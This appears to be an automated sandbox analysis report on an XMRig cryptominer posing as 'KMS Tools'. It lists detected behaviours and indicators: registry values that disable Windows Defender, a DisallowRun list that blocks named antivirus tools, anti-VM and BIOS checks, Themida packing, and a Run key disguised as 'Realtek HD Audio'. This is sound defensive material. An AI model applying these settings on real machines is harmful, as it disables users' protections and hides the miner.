xmrig | 3611d70fd0636f5858bd4d436e75e4afc9fc8763a034254ad6d5033f4a64ef84

Modify Existing Service

Disabling Security Tools

T1089

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	Process not Found
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	Process not Found
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Process not Found
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification = "1"	Process not Found
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	Process not Found
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	Process not Found
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\RealtimeScanDirection = "2"	Process not Found

Modifies Windows Defender notification settings 3 TTPs 2 IoCs

evasion trojan

Modify Existing Service

Modify Registry

Disabling Security Tools

T1089

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1"	Process not Found
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications	Process not Found

Modifies visiblity of hidden/system files in Explorer 2 TTPs 1 IoCs

Hidden Files and Directories

T1158

Modify Registry

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	taskhost.exe

XMRig Miner payload 4 IoCs

miner

resource	yara_rule
behavioral8/files/0x000300000000073f-363.dat	family_xmrig
behavioral8/files/0x000300000000073f-363.dat	xmrig
behavioral8/files/0x000300000000073f-401.dat	family_xmrig
behavioral8/files/0x000300000000073f-401.dat	xmrig

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 47 IoCs

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	KMS Tools Unpack.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Process not Found
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Process not Found
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Process not Found
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Process not Found
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Process not Found
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Process not Found
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Process not Found
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Process not Found
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Process not Found
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Process not Found
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Process not Found
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Process not Found
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Process not Found
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Process not Found
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Process not Found
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Process not Found
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Process not Found
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Process not Found
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Process not Found
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Process not Found
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Process not Found
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Process not Found
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Process not Found
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	taskhost.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Process not Found
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Process not Found
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Process not Found
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	taskhostw.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Process not Found
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Process not Found
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Process not Found
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Process not Found
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Process not Found
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Process not Found
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Process not Found
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Process not Found
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Process not Found
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Process not Found
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Process not Found
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Process not Found
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Process not Found
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Process not Found
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Process not Found
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Process not Found
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Process not Found
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Process not Found

Blocks application from running via registry modification 27 IoCs

Adds application to list of disallowed applications.

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\2 = "avast_free_antivirus_setup_online.exe"	Process not Found
Set value (str)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\4 = "essf_trial_rus.exe"	Process not Found
Set value (str)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\15 = "cureit.exe"	Process not Found
Set value (int)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	Process not Found
Set value (str)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\7 = "ESETOnlineScanner_RUS.exe"	Process not Found
Set value (str)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\19 = "eset_nod32_antivirus_live_installer.exe"	Process not Found
Set value (str)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\22 = "bitdefender_avfree.exe"	Process not Found
Set value (str)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\25 = "TDSSKiller.exe"	Process not Found
Set value (str)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\3 = "eis_trial_rus.exe"	Process not Found
Set value (str)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\8 = "HitmanPro.exe"	Process not Found
Set value (str)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\9 = "360TS_Setup_Mini.exe"	Process not Found
Set value (str)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\13 = "AV_br.exe"	Process not Found
Set value (str)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\5 = "hitmanpro_x64.exe"	Process not Found
Set value (str)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\12 = "AVbr.exe"	Process not Found
Set value (str)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\1 = "eav_trial_rus.exe"	Process not Found
Key created	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun	Process not Found
Set value (str)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\6 = "ESETOnlineScanner_UKR.exe"	Process not Found
Set value (str)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\14 = "KVRT.exe"	Process not Found
Set value (str)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\23 = "drweb-12.0-ss-win.exe"	Process not Found
Set value (str)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\24 = "Cureit.exe"	Process not Found
Set value (str)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\21 = "PANDAFREEAV.exe"	Process not Found
Set value (str)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\10 = "Cezurity_Scanner_Pro_Free.exe"	Process not Found
Set value (str)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\17 = "eset_internet_security_live_installer.exe"	Process not Found
Set value (str)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\11 = "Cube.exe"	Process not Found
Set value (str)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\16 = "FRST64.exe"	Process not Found
Set value (str)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\18 = "esetonlinescanner.exe"	Process not Found
Set value (str)	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\20 = "MBSetup.exe"	Process not Found

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	taskhostw.exe

Modifies Windows Firewall 1 TTPs 7 IoCs

Modify Existing Service

pid	Process
5056	netsh.exe
3388	netsh.exe
3188	netsh.exe
1556	netsh.exe
2208	netsh.exe
1156	netsh.exe
4632	netsh.exe

Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

Checks BIOS information in registry 2 TTPs 64 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	taskhost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	taskhostw.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	KMS Tools Unpack.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	taskhost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	taskhostw.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Process not Found

Executes dropped EXE 51 IoCs

pid	Process
1132	install.exe
3560	KMS.exe
4776	Process not Found
4732	Process not Found
2832	Process not Found
5064	taskhost.exe
1348	taskhostw.exe
2220	Process not Found
4596	Process not Found
4840	Process not Found
2408	Process not Found
264	Process not Found
3856	Process not Found
4336	Process not Found
1648	Process not Found
2388	Process not Found
2308	Process not Found
4608	Process not Found
1864	Process not Found
4044	Process not Found
4952	Process not Found
2140	Process not Found
228	Process not Found
2296	Process not Found
4532	Process not Found
4636	Process not Found
5056	Process not Found
2864	Process not Found
3604	Process not Found
2792	Process not Found
2172	Process not Found
5112	Process not Found
424	Process not Found
3200	Process not Found
2580	Process not Found
1648	Process not Found
2852	Process not Found
1752	Process not Found
4976	Process not Found
3196	Process not Found
4088	Process not Found
4964	Process not Found
1728	Process not Found
2908	Process not Found
3988	Process not Found
4184	Process not Found
2656	Process not Found
2280	Process not Found
1668	Process not Found
632	Process not Found
2980	Process not Found

Themida packer 64 IoCs

Detects Themida, an advanced Windows software protection system.

themida

resource	yara_rule
behavioral8/memory/1760-133-0x00007FF6063A0000-0x00007FF60721D000-memory.dmp	themida
behavioral8/memory/1760-134-0x00007FF6063A0000-0x00007FF60721D000-memory.dmp	themida
behavioral8/memory/1760-135-0x00007FF6063A0000-0x00007FF60721D000-memory.dmp	themida
behavioral8/memory/1760-136-0x00007FF6063A0000-0x00007FF60721D000-memory.dmp	themida
behavioral8/memory/1760-137-0x00007FF6063A0000-0x00007FF60721D000-memory.dmp	themida
behavioral8/memory/1760-138-0x00007FF6063A0000-0x00007FF60721D000-memory.dmp	themida
behavioral8/memory/1760-139-0x00007FF6063A0000-0x00007FF60721D000-memory.dmp	themida
behavioral8/memory/1760-140-0x00007FF6063A0000-0x00007FF60721D000-memory.dmp	themida
behavioral8/memory/1760-141-0x00007FF6063A0000-0x00007FF60721D000-memory.dmp	themida
behavioral8/memory/1760-148-0x00007FF6063A0000-0x00007FF60721D000-memory.dmp	themida
behavioral8/memory/1760-154-0x00007FF6063A0000-0x00007FF60721D000-memory.dmp	themida
behavioral8/files/0x0007000000023154-161.dat	themida
behavioral8/files/0x0007000000023154-183.dat	themida
behavioral8/files/0x0007000000023154-182.dat	themida
behavioral8/files/0x0006000000023163-188.dat	themida
behavioral8/memory/4776-195-0x00007FF799B20000-0x00007FF79B0A9000-memory.dmp	themida
behavioral8/files/0x0006000000023163-199.dat	themida
behavioral8/files/0x0006000000023163-198.dat	themida
behavioral8/memory/4776-202-0x00007FF799B20000-0x00007FF79B0A9000-memory.dmp	themida
behavioral8/memory/4776-203-0x00007FF799B20000-0x00007FF79B0A9000-memory.dmp	themida
behavioral8/memory/4776-204-0x00007FF799B20000-0x00007FF79B0A9000-memory.dmp	themida
behavioral8/memory/4776-205-0x00007FF799B20000-0x00007FF79B0A9000-memory.dmp	themida
behavioral8/memory/4776-206-0x00007FF799B20000-0x00007FF79B0A9000-memory.dmp	themida
behavioral8/memory/4776-207-0x00007FF799B20000-0x00007FF79B0A9000-memory.dmp	themida
behavioral8/memory/4776-208-0x00007FF799B20000-0x00007FF79B0A9000-memory.dmp	themida
behavioral8/memory/4776-209-0x00007FF799B20000-0x00007FF79B0A9000-memory.dmp	themida
behavioral8/memory/4732-212-0x00007FF76F1E0000-0x00007FF7701E0000-memory.dmp	themida
behavioral8/memory/4776-214-0x00007FF799B20000-0x00007FF79B0A9000-memory.dmp	themida
behavioral8/memory/4732-215-0x00007FF76F1E0000-0x00007FF7701E0000-memory.dmp	themida
behavioral8/memory/4732-217-0x00007FF76F1E0000-0x00007FF7701E0000-memory.dmp	themida
behavioral8/memory/4776-216-0x00007FF799B20000-0x00007FF79B0A9000-memory.dmp	themida
behavioral8/memory/4732-218-0x00007FF76F1E0000-0x00007FF7701E0000-memory.dmp	themida
behavioral8/memory/4732-219-0x00007FF76F1E0000-0x00007FF7701E0000-memory.dmp	themida
behavioral8/memory/4732-221-0x00007FF76F1E0000-0x00007FF7701E0000-memory.dmp	themida
behavioral8/memory/4732-222-0x00007FF76F1E0000-0x00007FF7701E0000-memory.dmp	themida
behavioral8/memory/4776-234-0x00007FF799B20000-0x00007FF79B0A9000-memory.dmp	themida
behavioral8/memory/4732-238-0x00007FF76F1E0000-0x00007FF7701E0000-memory.dmp	themida
behavioral8/memory/4732-240-0x00007FF76F1E0000-0x00007FF7701E0000-memory.dmp	themida
behavioral8/memory/1760-254-0x00007FF6063A0000-0x00007FF60721D000-memory.dmp	themida
behavioral8/memory/4732-255-0x00007FF76F1E0000-0x00007FF7701E0000-memory.dmp	themida
behavioral8/memory/4732-258-0x00007FF76F1E0000-0x00007FF7701E0000-memory.dmp	themida
behavioral8/files/0x0007000000023181-263.dat	themida
behavioral8/memory/1760-268-0x00007FF6063A0000-0x00007FF60721D000-memory.dmp	themida
behavioral8/files/0x0007000000023181-272.dat	themida
behavioral8/files/0x0007000000023181-273.dat	themida
behavioral8/files/0x0006000000023182-274.dat	themida
behavioral8/files/0x0006000000023182-281.dat	themida
behavioral8/files/0x0006000000023182-280.dat	themida
behavioral8/memory/5064-282-0x00007FF6D86D0000-0x00007FF6DB38F000-memory.dmp	themida
behavioral8/memory/5064-283-0x00007FF6D86D0000-0x00007FF6DB38F000-memory.dmp	themida
behavioral8/memory/5064-284-0x00007FF6D86D0000-0x00007FF6DB38F000-memory.dmp	themida
behavioral8/memory/5064-287-0x00007FF6D86D0000-0x00007FF6DB38F000-memory.dmp	themida
behavioral8/memory/1348-285-0x00007FF6E6620000-0x00007FF6E99A3000-memory.dmp	themida
behavioral8/memory/1348-289-0x00007FF6E6620000-0x00007FF6E99A3000-memory.dmp	themida
behavioral8/memory/5064-290-0x00007FF6D86D0000-0x00007FF6DB38F000-memory.dmp	themida
behavioral8/memory/1348-291-0x00007FF6E6620000-0x00007FF6E99A3000-memory.dmp	themida
behavioral8/memory/1348-292-0x00007FF6E6620000-0x00007FF6E99A3000-memory.dmp	themida
behavioral8/memory/5064-293-0x00007FF6D86D0000-0x00007FF6DB38F000-memory.dmp	themida
behavioral8/memory/5064-294-0x00007FF6D86D0000-0x00007FF6DB38F000-memory.dmp	themida
behavioral8/memory/1348-295-0x00007FF6E6620000-0x00007FF6E99A3000-memory.dmp	themida
behavioral8/memory/5064-296-0x00007FF6D86D0000-0x00007FF6DB38F000-memory.dmp	themida
behavioral8/memory/1348-297-0x00007FF6E6620000-0x00007FF6E99A3000-memory.dmp	themida
behavioral8/memory/1348-298-0x00007FF6E6620000-0x00007FF6E99A3000-memory.dmp	themida
behavioral8/memory/5064-299-0x00007FF6D86D0000-0x00007FF6DB38F000-memory.dmp	themida

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	taskhostw.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio = "C:\\ProgramData\\RealtekHD\\taskhostw.exe"	taskhostw.exe

Checks whether UAC is enabled 1 TTPs 33 IoCs

evasion trojan

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Process not Found
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Process not Found
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Process not Found
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Process not Found
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Process not Found
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Process not Found
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Process not Found
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Process not Found
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	taskhost.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Process not Found
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Process not Found
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Process not Found
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Process not Found
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Process not Found
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Process not Found
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Process not Found
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Process not Found
